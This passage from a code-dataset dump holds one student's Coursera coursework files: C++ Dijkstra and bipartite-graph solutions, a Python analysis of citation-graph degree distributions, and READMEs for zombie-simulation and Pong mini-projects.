\"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest2[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance2[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t************************************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.5782669186592102,
"alphanum_fraction": 0.6127443313598633,
"avg_line_length": 31.48969078063965,
"blob_id": "e89a4223adbba37a20ddce6d5721067e62bfac43",
"content_id": "e31982326e8c7e02bed136a24ce96ab492517695",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6509,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 194,
"path": "/Algorithms on Graphs/Assignment4/dijkstra.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: dijkstra.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 1 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with positive edge weights and with n vertices and m edges as well as two\r\n//\t\t\t\tvertices u and v, compute the weight of a shortest path between u and v(that is, the minimum total\r\n//\t\t\t\tweight of a path from u to v).\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. The last line contains the vertice u and v for which we want to \r\n//\t\t\t\tfind the minimum distance from u to v. \r\n//\r\n//\t\t\t\tOutput: Output the minimum weight of a path from u to v, or −1 if there is no path\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tdistance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.14/2.00 sec, max memory used: 41.4/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n#include <functional>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Used for creating a min priority queue i.e the top of the queue will contain\r\n// the smallest element.\r\nstruct pri\r\n{\r\n\tint operator() (const pair<int, int>&p1, const pair<int, int>&p2)\r\n\t{\r\n\t\treturn (p1.second > p2.second);\r\n\t}\r\n};\r\n\r\n// Performs breath first search to finds the minimum weight of the path from s to t or returns -1\r\n// if no path exists\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e5; t != s; 0 <= t,s < n; edge weights are non-negative integers not\r\n// exceeding 10e3 (note that m = edges of undirected graph adj and n = size of adj)\r\n// POST: return the shortest path between s and t if there exists one or -1 otherwise if s and t are not connected\r\n// PARAM: adj = undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n//\t\t s = a vertice of the graph adj\r\n//\t\t t = another vertice of the graph adj (t != s)\r\n\r\nint distance(vector<vector<int> > &adj, vector<vector<int> > &cost, int s, int t) {\r\n\r\n\t// intialize a min priority queue that stores a vector of pairs with first value of\r\n\t// the pair being the vertice number while second being the current minimum distance\r\n\t// to reach that vertice\r\n\tstd::priority_queue<int, std::vector< pair<int,int> >, pri > min_queue;\r\n\t// intialize a vector of pairs of int and bool where the first value represents the\r\n\t// current minimum distance to reach that vertice from s and second value stores a bool \r\n\t// that represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\t//set the start vertice s as visited \r\n\tdist[s].second = true;\r\n\r\n\t//push the start vertice onto the queue\r\n\tmin_queue.push(std::make_pair(s, dist[s].first));\r\n\t//intialize a variable to keep track of the current vertice\r\n\tint w;\r\n\r\n\r\n\twhile (!min_queue.empty())\r\n\t{\r\n\t\tw = 
min_queue.top().first;\r\n\t\t//if the current vertice is the same as the target vertice, return the distance of that vertice. \r\n\t\t//this is the shorted distance from s to t\r\n\t\tif (w == t)\r\n\t\t\treturn dist[t].first;\r\n\t\tmin_queue.pop();\r\n\r\n\t\t//for all vertices reachable from w\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\r\n\t\t\t// if the current vertice has not yet been visited or the current minimum distance of that vertice \r\n\t\t\t// (s to the vertice) is greater than the distance at w + distance from w to that vertice\r\n\t\t\tif (dist[adj[w][v]].second == false || dist[adj[w][v]].first > dist[w].first + cost[w][v]) {\r\n\r\n\t\t\t\t//mark it as visited\r\n\t\t\t\tdist[adj[w][v]].second = true;\r\n\t\t\t\t//update the distance of this vertice from w. \r\n\t\t\t\tdist[adj[w][v]].first = dist[w].first + cost[w][v];\r\n\t\t\t\tmin_queue.push(std::make_pair(adj[w][v], dist[adj[w][v]].first));\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tint s, t;\r\n\tstd::cin >> s >> t;\r\n\ts--, t--;\r\n\tstd::cout << distance(adj, cost, s, t);\r\n\r\n\t// Few test case to check if the distance function works. These are commented since the \r\n\t// assignment requires the bfs.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\t\r\n\t/*\r\n\t//test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tvector<vector<int> > cost1(4, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(1);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tcost1[4 - 1].push_back(2);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(2);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tcost1[1 - 1].push_back(5);\r\n\r\n\tstd::cout << distance(adj1, cost1, 1-1, 3-1) << std::endl;\r\n\r\n\t//test 2\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tvector<vector<int> > cost2(5, vector<int>());\r\n\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tcost2[1 - 1].push_back(4);\r\n\r\n\tadj2[1 - 1].push_back(3 - 1);\r\n\tcost2[1 - 1].push_back(2);\r\n\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tcost2[3 - 1].push_back(1);\r\n\r\n\tadj2[2 - 1].push_back(4 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(5 - 1);\r\n\tcost2[3 - 1].push_back(4);\r\n\r\n\tadj2[5 - 1].push_back(4 - 1);\r\n\tcost2[5 - 1].push_back(1);\r\n\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\tcost2[2 - 1].push_back(3);\r\n\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\tcost2[3 - 1].push_back(4);\r\n\r\n\tstd::cout << distance(adj2, cost2, 1 - 1, 5 - 1) << std::endl;\r\n\r\n\t//test 3\r\n\tvector<vector<int> > adj3(3, vector<int>());\r\n\tvector<vector<int> > cost3(3, vector<int>());\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tcost3[1 - 1].push_back(7);\r\n\r\n\tadj3[1 - 1].push_back(3 - 1);\r\n\tcost3[1 - 1].push_back(5);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tcost3[2 - 1].push_back(2);\r\n\r\n\tstd::cout << distance(adj3, cost3, 3 - 1, 2 - 1) << std::endl;\r\n\r\n\tsystem(\"PAUSE\");\r\n\t*/\r\n}\r\n"
},
{
"alpha_fraction": 0.5348203182220459,
"alphanum_fraction": 0.5712515711784363,
"avg_line_length": 27.45255470275879,
"blob_id": "2bb65dfbb308760d78acb55623a7bec963997369",
"content_id": "d3c0d47958483e42aee6aca565bb2b2f18ad102c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4045,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 137,
"path": "/Algorithms on Graphs/Assignment3/bipartite.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: bipartite.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-10\r\n// description: Problem 2 of the third assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Given an undirected graph with n vertices and m edges, check whether it is bipartite.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tand edges m for the graph (put a space between the two). \r\n//\r\n//\t\t\t\tOutput: Output 1 if the graph is bipartite and 0 otherwise.\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tbipartite function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 41.9/513 MB. \r\n\r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\n\r\n// Finds whether the given graph is bipartite. See http://mathworld.wolfram.com/BipartiteGraph.html\r\n// for details on bipartite graph\r\n//\r\n// PRE: 1 ≤ n ≤ 10e5; 0 ≤ m ≤ 10e5; t != s; 0 < t,s < n -1 (note that m = edges of undirected graph\r\n//\t\tadj and n = size of adj)\r\n// POST: return 1 if the graph adj is bipartite or 0 otherwise\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n\r\nint bipartite(vector<vector<int> > &adj) {\r\n\r\n\tqueue<int> myQueue;\r\n\r\n\t//white color (first color) is represented by 1, black (second color) by 0 and nodes\r\n\t//that are not yet colored are represented by -1\r\n\tvector<int> colors(adj.size(), -1);\r\n\r\n\tmyQueue.push(0);\r\n\t//colors source node white\r\n\tcolors[0] = 1;\r\n\r\n\tint u;\r\n\r\n\t//run BFS while queue is not empty\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\t//store the node at front and dequeue it\r\n\t\tu = myQueue.front();\r\n\t\tmyQueue.pop();\r\n\r\n\t\t//explore all nodes adjacent to u\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\t\t//if the node adjacent to u is not colored\r\n\t\t\tif (colors[adj[u][v]] == -1) {\r\n\r\n\t\t\t\t//assign an alternate colors.\r\n\t\t\t\tcolors[adj[u][v]] = 1 - colors[u];\r\n\t\t\t\tmyQueue.push(adj[u][v]);\r\n\t\t\t}\r\n\t\t\t//else if the adjacent node is the same color as u, then the graph cannot be bipartite\r\n\t\t\telse if (colors[adj[u][v]] == colors[u])\r\n\t\t\t\treturn 0;\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tstd::cout << bipartite(adj);\r\n\t\r\n\r\n\t// Few test case to check if the bipartite function works. 
These are commented since the \r\n\t// assignment requires the bipartite.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/******************************************************************************************\r\n\t//Test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(2 - 1);\r\n\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\r\n\tif (bipartite(adj1) == 0)\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\r\n\t//test2\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\r\n\tadj2[4 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(4 - 1);\r\n\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\r\n\tadj2[1 - 1].push_back(4 - 1);\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\r\n\tif (bipartite(adj2) == 1)\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 failed\" << std::endl;\r\n\r\n\tsystem(\"PAUSE\");\r\n\t*******************************************************************************************************/\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.7461465001106262,
"alphanum_fraction": 0.7517877221107483,
"avg_line_length": 47.7829475402832,
"blob_id": "6aa1e988ca43ccdf2f1a3410a99c1f4d3f2dd6e4",
"content_id": "c189e48b7e73401fe08d596f7e6c319fa348fe10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12586,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 258,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_application1_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAnalyze the structure of graphs generated by citation patterns from scientific papers\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport parse_graph\nimport alg_project1_solution as alg_proj1_sol\nimport alg_dpa_trial as dpa\n\n##### Q1 Solution #####\n# For this question, your task is to load a provided citation graph for 27,770\n# high energy physics theory papers. This graph has 352,768 edges. You should\n# use the following code to load the citation graph as a dictionary. In\n# CodeSkulptor, loading the graph should take 5-10 seconds. (For an extra\n# challenge, you are welcome to write your own function to create the citation\n# graph by parsing this text representation of the citation graph.)\n#\n# Your task for this question is to compute the in-degree distribution for this\n# citation graph. Once you have computed this distribution, you should normalize\n# the distribution (make the values in the dictionary sum to one) and then\n# compute a log/log plot of the points in this normalized distribution. How you\n# create this point plot is up to you. You are welcome to use a package such as\n# matplotlib for desktop Python, use the simpleplot module in CodeSkulptor, or\n# use any other method that you wish\n\n# load the graph from the text file\ncit_graph = parse_graph.load_graph(\"citation_graph.txt\")\n\n# get the unnormalized in degree distribution\nin_deg_dist = alg_proj1_sol.in_degree_distribution(cit_graph)\n\n# normalize the in degree distribution\nsum_val = sum(in_deg_dist.values())\nin_deg_dist.update((degree, freq / float(sum_val)) for degree, freq in in_deg_dist.items())\n\n# draw the loglog plot of the normalized in degree distribution of the citation graphe\nplt.figure(0)\nplt.loglog(in_deg_dist.keys(), in_deg_dist.values(), basex=10, basey=10, linestyle='None',\n marker='.', markeredgecolor='blue')\nplt.title('loglog plot of in-degree distribution of citation Graph')\nplt.xlabel('number of citations')\nplt.ylabel('fraction of papers')\nplt.grid()\nplt.ylim(None, 1)\nplt.show()\n#plt.savefig(\"Q1_loglog_degree_dist_citgraph.png\")\n\n##### Q2 Solution #####\n# In Homework 1, you saw Algorithm ER for generating random graphs and reasoned\n# analytically about the properties of the ER graphs it generates. Consider the\n# simple modification of the algorithm to generate random directed graphs: For\n# every ordered pair of distinct nodes (i, j), the modified algorithm adds the\n# directed edge from i to j with probability p.\n#\n# For this question, your task is to consider the shape of the in-degree\n# distribution for an ER graph and compare its shape to that of the physics\n# citation graph. In the homework, we considered the probability of a specific\n# in-degree, k, for a single node. Now, we are interested in the in-degree\n# distribution for the entire ER graph. To determine the shape of this\n# distribution, you are welcome to compute several examples of in-degree\n# distributions or determine the shape mathematically.\n#\n# Once you have determined the shape of the in-degree distributions for ER graphs,\n# compare the shape of this distribution to the shape of the in-degree distribution\n# for the citation graph. 
When answering this question, make sure to address the\n# following points:\n#\n# Q2.1: Is the expected value of the in-degree the same for every node in an ER graph?\n# Please answer yes or no and include a short explanation for your answer.\n\n# Ans: yes it same for all nodes since the presence of an edge is independent of\n# all other edges i.e it is independent of the current structure of the graph\n# The expected value of in-degree is given by p * (n-1)\n\n# Q2.2: What does the in-degree distribution for an ER graph look like?\n# Provide a short written description of the shape of the distribution.\n\n# Ans: we know that the probability that a given node has degree k is given by\n# a binomial distribution as seen in the homework. Thus as p -> 0 (probability\n# p becomes smaller), we see more nodes with smaller in-degree and thus\n# the in-degree distribution shape looks like a bell curve skewed towards the\n# left i.e near in-degree 0. As p -> 1, we get more nodes with higher in-degree\n# and the shape is increasing curve with most points near the higher\n# in-degree region. For large number of nodes, and small p, this becomes\n# a symmetric bell shaped curve and approaches a normal distribution\n\n# Q2.3: Does the shape of the in-degree distribution plot for ER look similar\n# to the shape of the in-degree distribution for the citation graph?\n# Provide a short explanation of the similarities or differences.\n# Focus on comparing the shape of the two plots as discussed in the class page on\n# \"Creating, formatting, and comparing plots\".\n\n# Ans: As mentioned in answer of Q2.2, the shape for the ER in-degree approaches\n# a bell-shaped curve for large N values and small p. However, for the citation\n# graph it is a decreasing curve with majority of point located near in-degree\n# of zero.\n\n##### Q3 Solution #####\n# We next consider a different process for generating synthetic directed graphs.\n# In this process, a random directed graph is generated iteratively, where in\n# each iteration a new node is created, added to the graph, and connected to a\n# subset of the existing nodes. This subset is chosen based on the in-degrees\n# of the existing nodes. More formally, to generate a random directed graph in\n# this process, the user must specify two parameters: nn, which is the final\n# number of nodes, and m (where m <= n), which is the number of existing\n# nodes to which a new node is connected during each iteration. Notice that m\n# is fixed throughout the procedure.\n#\n# The algorithm starts by creating a complete directed graph on mm nodes.\n# (Note, you've already written the code for this part in the Project.) Then,\n# the algorithm grows the graph by adding n-m nodes, where each new node is\n# connected to m nodes randomly chosen from the set of existing nodes. As an\n# existing node may be chosen more than once in an iteration, we eliminate\n# duplicates (to avoid parallel edges); hence, the new node may be connected\n# to fewer than m existing nodes upon its addition.\n\n# The algorithm is called Algorithm DPA (note that the m in the input is a\n# parameter that is specified to this algorithm, and it does not denote the\n# total number of edges in the resulting graph).\n\n# For this question, we will choose values for n and m that yield a DPA\n# graph whose number of nodes and edges is roughly the same to those of the\n# citation graph. For the nodes, choosing n to be the number of nodes as\n# the citation graph is easy. 
Since each step in the DPA algorithm adds m\n# edges to the graph, a good choice for m is an integer that is close to\n# the average out-degree of the physics citation graph.\n\n# For this question, provide numerical values for n and m that you will\n# use in your construction of the DPA graph.\n\n# calculate n, i.e the number of nodes in citation graph for DPA algorithm\nn_nodes = len(cit_graph.keys())\n# calculate m, i.e the average out-degree in citation graph for DPA algorithm\nm_nodes = int(round(np.mean([len(neighbors) for neighbors in cit_graph.values()])))\n\nprint \"Q3 Solution:\"\nprint \"n = \", n_nodes\nprint \"m = \", m_nodes\n\n##### Q4 Solution #####\n# Your task for this question is to implement the DPA algorithm, compute a DPA\n# graph using the values from Question 3, and then plot the in-degree distribution\n# for this DPA graph. Creating an efficient implementation of the DPA algorithm\n# from scratch is surprisingly tricky. The key issue in implementing the algorithm\n# is to avoid iterating through every node in the graph when executing Line 6\n# of the provided pseudocode. Using a loop to implement Line 6 leads to implementations\n# that require on the order of 30 minutes in desktop Python to create a DPA graph with\n# 28000 nodes.\n#\n# To avoid this bottleneck, you are welcome to use this provided code that implements\n# a DPATrial class.\n#\n# Once you have created a DPA graph of the appropriate size, compute a (normalized)\n# log/log plot of the points in the graph's in-degree distribution\n\n# write the function for generating DPA graphs\ndef alg_dpa(n_num_nodes, m_num_nodes):\n \"\"\"\n Uses the DPA algorithm provided in Q3 of the Application\n to generates a random directed graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on DPA algorithm\n \"\"\"\n\n # create a complete graph of m_nodes noes\n graph = alg_proj1_sol.make_complete_graph(m_num_nodes)\n\n # create the DPA trial object corresponding to complete graph\n dpa_trial = dpa.DPATrial(m_num_nodes)\n\n # add each new ode to m_nodes from the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the DPATrial class\n for new_node in range(m_num_nodes, n_num_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. 
Remove any\n        # duplicates among the m_num_nodes selected\n        new_node_neighbors = dpa_trial.run_trial(m_num_nodes)\n\n        # update the existing graph to add this new node and its\n        # neighbors\n        graph[new_node] = new_node_neighbors\n\n\n    return graph\n\n# create the graph using the DPA algorithm\ndpa_graph = alg_dpa(n_nodes, m_nodes)\n\n# get the in-degree distribution for the DPA graph\nin_deg_dist_dpa = alg_proj1_sol.in_degree_distribution(dpa_graph)\n\n# normalize the in-degree distribution for the DPA graph\nsum_val = sum(in_deg_dist_dpa.values())\nin_deg_dist_dpa.update((degree, freq / float(sum_val)) for degree, freq in in_deg_dist_dpa.items())\n\n# draw the loglog plot of the normalized in-degree distribution of the DPA graph\nplt.figure(1)\nplt.loglog(in_deg_dist_dpa.keys(), in_deg_dist_dpa.values(), basex=10, basey=10,\n           linestyle='None', marker='.', markeredgecolor='blue')\nplt.title('loglog plot of In-degree distribution of DPA graph')\nplt.xlabel('in-degree')\nplt.ylabel('fraction of nodes')\nplt.ylim(None, 1)\nplt.grid()\nplt.show()\n#plt.savefig(\"Q4_loglog_indegree_dist_dpa.png\")\n\n##### Q5 Solution #####\n# In this last problem, we will compare the in-degree distribution for the citation graph\n# to the in-degree distribution for the DPA graph as constructed in Question 4. In\n# particular, we will consider whether the shapes of these two distributions are similar\n# and, if they are similar, what might be the cause of the similarity.\n#\n# To help you in your analysis, you should consider the following three phenomena:\n# - The \"six degrees of separation\" phenomenon,\n# - The \"rich gets richer\" phenomenon, and\n# - The \"Hierarchical structure of networks\" phenomenon.\n#\n# Your task for this problem is to consider how one of these phenomena might explain\n# the structure of the citation graph or, alternatively, how the citation patterns\n# follow one of these phenomena.\n#\n# When answering this question, please include answers to the following:\n#\n# Q5.1: Is the plot of the in-degree distribution for the DPA graph similar to that of the\n# citation graph? Provide a short explanation of the similarities or differences.\n# Focus on the various properties of the two plots as discussed in the class page on\n# \"Creating, formatting, and comparing plots\".\n\n# Ans: Yes, they are similar, since both follow a linearly decreasing log-log trend, i.e.\n# they both follow a power-law distribution, and the points are spread out more\n# as the in-degree increases\n\n# Q5.2: Which one of the three social phenomena listed above mimics the behavior of the DPA\n# process? Provide a short explanation for your answer.\n\n# Ans: the DPA process mimics the \"rich gets richer\" or \"preferential attachment\" phenomenon,\n# since every new node that is added to the graph is most likely to be connected to\n# the existing nodes with the highest in-degree.\n\n# Q5.3: Could one of these phenomena explain the structure of the physics citation graph?\n# Provide a short explanation for your answer.\n\n# Ans: The citation graph also mimics the \"rich gets richer\" phenomenon, as papers with\n# more citations, i.e. higher in-degree, are more likely to be cited in other papers\n# as well due to being more visible\n"
},
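The `run_trial` call in the solution above hides the trick that makes DPA fast: rather than iterating over every node and computing its selection probability, one can keep a list in which each node appears (in-degree + 1) times and sample from it uniformly. Below is a minimal sketch of that idea; the class and method names mirror the provided DPATrial helper, but this is an illustration of the technique, not the course's exact code.

```python
import random

class DPATrialSketch(object):
    """Illustrative stand-in for the provided DPATrial class."""

    def __init__(self, num_nodes):
        # starting from a complete graph on num_nodes nodes, each node has
        # in-degree (num_nodes - 1), so it appears (in-degree + 1) = num_nodes times
        self._num_nodes = num_nodes
        self._node_numbers = [node for node in range(num_nodes)
                              for _ in range(num_nodes)]

    def run_trial(self, num_nodes):
        # uniform sampling from the multiset is equivalent to sampling with
        # probability (in-degree + 1) / (total in-degree + number of nodes)
        new_neighbors = set(random.choice(self._node_numbers)
                            for _ in range(num_nodes))
        # update the multiset: the new node appears once for itself, and each
        # chosen neighbor gains one appearance for its new in-coming edge
        self._node_numbers.append(self._num_nodes)
        self._node_numbers.extend(new_neighbors)
        self._num_nodes += 1
        return new_neighbors
```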
{
"alpha_fraction": 0.7905405163764954,
"alphanum_fraction": 0.7932432293891907,
"avg_line_length": 226.76922607421875,
"blob_id": "7e1955526a1db5bea2aceb4137df8e082ef63747",
"content_id": "ca987dd380bfc96baa5f329bdfe91ee9ff54b374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2960,
"license_type": "no_license",
"max_line_length": 802,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project1 Zombie Apocalypse/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 Zombie Apocalypse\n\nDeveloped a simulation of zombies and humans interacting on a grid in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To see the simulation in action, click [here](http://www.codeskulptor.org/#user46_uQfN1iv6Qq_0.py) and press the play button on the top left corner. A window will pop up. Click on the Add button on the left to either add human, zombies or obstacles to the screen on the right and click on the screen to add them on desired location. Black block represents obstacles, green ones represent humans, and red blocks represent zombies. To see how zombie would attack humans or how humans will flee zombie press the \"Zombies stalk\" or \"Humans flee\" buttons\n\nMini-project overview taken from course page can be found below:\n* In this mini-project, we will create a simulation of zombies and humans interacting on a grid. As in the movies, our zombies are hungry for human brains. As a result, zombies chase humans and humans flee from zombies. To keep our simulation manageable, the positions of the zombies and humans will be restricted to a grid. In our simulation, zombies are not very agile and can only move up, down, left or right in one step of the simulation. On the other hand, humans are more agile and can move in these four directions as well as the four neighboring diagonal directions. If a zombie catches a human by positioning itself in the same cell, the zombie enjoys some delicious human brains. Being a Computer Scientist, the human has plenty of brains to spare and continues to live on in our simulation.\n\n* To enhance the realism of our simulation, some of the cells in this grid will be marked as impassable and restrict zombie/human movement so that they can not move through these cells. Our task in this simulation is to implement an **Apocalypse** class that encapsulates the core mechanisms of this simulation and that interacts with a GUI that we have created for visualizing the simulation in CodeSkulptor. This **Apocalypse** class is a sub-class of the **Grid** class and inherits the **Grid** class methods. Passable cells in the grid correspond to **EMPTY** cells while **FULL** cells are impassable. Humans and zombies can only inhabit passable cells of the grid. However, several humans and zombies may inhabit the same grid cell.\n\n* This **Apocalypse** class also includes two lists, one for zombies and one for humans. Note that the entries in each list are cell indices of the form **(row,col)** that represent the position of zombies/humans in the grid. Each step in the simulation will either update the positions of the zombies based on the state of the grid and the position of the humans or update the positions of the humans based on the state of the grid and the position of the zombies.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/3VwCE/mini-project-description>"
},
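The movement rules the README describes (four-way moves for zombies, eight-way moves for humans, with impassable cells) reduce to filtering neighbor offsets against the grid. A small sketch of that filtering step follows; the `is_empty` helper is hypothetical, since the actual class delegates this to the provided Grid methods.

```python
# offsets for the two movement rules described above
FOUR_WAY = [(-1, 0), (1, 0), (0, -1), (0, 1)]                # zombies
EIGHT_WAY = FOUR_WAY + [(-1, -1), (-1, 1), (1, -1), (1, 1)]  # humans

def passable_neighbors(cell, offsets, grid_height, grid_width, is_empty):
    """Yield the in-bounds, passable cells reachable in one step from cell."""
    row, col = cell
    for drow, dcol in offsets:
        nrow, ncol = row + drow, col + dcol
        if 0 <= nrow < grid_height and 0 <= ncol < grid_width and is_empty(nrow, ncol):
            yield (nrow, ncol)
```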
{
"alpha_fraction": 0.7721201777458191,
"alphanum_fraction": 0.7813021540641785,
"avg_line_length": 148.5,
"blob_id": "523ad53cf68c64bb7d4667eddad9d1bdefeee462",
"content_id": "4fa19390977a0cd516bc137d16ab7c8b5d9878d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1198,
"license_type": "no_license",
"max_line_length": 488,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project4 Pong/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 - Pong\n\nImplemented a simple pong game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_oYvhasFKzo_1.py) and press the play button on the top left corner. To control the pong pad, use the up and down arrow keys for the right player and \"w\" and \"s\" keys for the left player. As the game progresses without any player losing a point, the speed of the ball will increase to make the game more fun to play.\n\nMini-project overview taken from course page can be found below:\n* \"In this project, we will build a version of Pong, one of the first arcade video games (1972). While Pong is not particularly exciting compared to today's video games, Pong is relatively simple to build and provides a nice opportunity to work on the skills that you will need to build a game like Asteroids. As usual, we have provided a [program template](http://www.codeskulptor.org/#examples-pong_template.py) that can be used to guide your development of Pong.\"\n\nComplete mini-project description can be found at: <https://www.coursera.org/learn/interactive-python-1/supplement/wiv24/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.6025364995002747,
"alphanum_fraction": 0.6275424957275391,
"avg_line_length": 29.07063102722168,
"blob_id": "c7e9b818171241b81e1735ebf271f7f858e36d02",
